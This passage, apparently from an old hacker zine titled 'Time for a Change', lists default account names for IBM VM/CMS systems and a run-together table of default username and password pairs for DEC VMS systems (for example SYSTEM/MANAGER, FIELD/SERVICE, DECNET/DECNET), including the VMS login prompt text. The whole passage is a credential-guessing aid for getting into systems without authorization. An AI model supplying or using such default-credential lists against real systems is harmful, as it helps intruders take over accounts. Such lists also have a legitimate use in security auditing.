CMSUSER EREP GCS IVPM1 IVPM2 MAINT OLTSEP OPERATNS OPERATOR SYSDUMP1 TSAFVM VSEMAINT VSEIPO ROUTER AP2SVP APL2PP VMASSYS VMASMON VASTEST BATCH BATCH1 BATCH2 CSPUSER CVIEW DIRMAINT DATAMOVE SFCNTRL FSFTASK1 FSFTASK2 FSFADMIN IIPS ADMIN DISKCNT CPRM OP1 VMUTIL IPFSERV ISPVM NETVIEW PRODBM PROMAIL PROCAL SYSADMIN SFCM1 PSFMAINT PDM470 PDMREMI PVM RSCS RSCSV2 SMART SQLDBA SQLUSER VMARCH VMBACKUP VMBSYSAD DEMO1 DEMO2 DEMO3 DEMO4 VMTAPE VMTLIBR VMMAP VTAM VM3812 VSEMAN PENG MOESERV VTAMUSER CCC IDMSSE IDMS ###### VMS (Digital Equipment Corp.) 
- Username: Password: User authorization failure USERNAME PASSWORD -------- -------- SYSTEM SYSTEM or MANAGER or OPERATOR or SYSLIB FIELD FIELD or SERVICE or TEST or DIGITAL DEFAULT USER or DEFAULT SYSTEST UETP or SYSTEST SYSMAINT SYSMAINT or SERVICE or DIGITAL VAX VAX VMS VMS DCL DCL DEMO DEMO TEST TEST HELP HELP NEWS NEWS GUEST GUEST GAMES GAMES DECNET DECNET SYS SYS NETCON NETCON ALLIN1 ALLIN1 NETPRIV NETPRIV OPERVAX OPERVAX ALLINONE ALLINONE TELEDEMO TELEDEMO NETSERVER NETSERVER NETNONPRIV NETNONPRIV RJE RJE HOST HOST LINK LINK INFO INFO BACKUP BACKUP NETWORK NETWORK DECMAIL DECMAIL HELPDESK HELPDESK REPORT REPORT MBWATCH MBWATCH MBMANAGER MBMANAGER SYSTEST_CLIG SYSTEST_CLIG UETP UETP USERP USERP STUDENT STUDENT PRIV PRIV POSTMASTER POSTMASTER NEWINGRES NEWINGRES NETMGR NETMGR NETSERVER NETSERVER INGRES INGRES MAILER MAILER DECNET DECNET ALLIN1MAIL ALLIN1MAIL HOST HOST ##### ----------------------------------------------------------------------------- END TIME FOR A CHANGE #2